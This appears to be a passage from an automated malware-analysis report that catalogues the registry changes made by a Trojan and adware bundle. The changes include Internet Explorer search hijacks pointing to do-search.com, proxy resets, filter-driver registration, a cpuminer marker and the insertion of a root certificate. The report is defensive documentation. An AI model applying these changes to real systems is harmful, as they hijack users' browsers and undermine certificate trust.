[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process powershell.exe:3772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process powershell.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "8A 92 33 64 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process XTab_Setup2253.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = "1"
[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "pcm"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = ""
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"
[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"CheckedValue" = "PMIL"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"DefaultValue" = "PMIL"
[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1D EF BE 63 9A 83 D0 01"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process amisid.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\InternetTurbo]
"UID" = "915A4028688142931B5DDA64A4540CAD"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"QuietUninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(xBLWr3p4Aq2S5TKPAPwXoUXvWB)"
[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
"UninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"DisplayName" = "GOSafer"
The process nfregdrv.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process nfregdrv.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0A 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process CashReminder.exe:1108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "15"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\CashReminder]
"instid" = "Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
"affid" = ""
[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Publisher" = "Related Deals LLC"
"UninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: EZbBN9f90YpDduoIMPstB7W)"
[HKLM\SOFTWARE\Wow6432Node\CashReminder]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
The process ActSys.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "19"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\527254500A2C2998BD4D09D9989A7F3E76405E07]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 52 72 54 50"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "12 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\ActSys]
"instid" = "RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"527254500A2C2998BD4D09D9989A7F3E76405E07"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
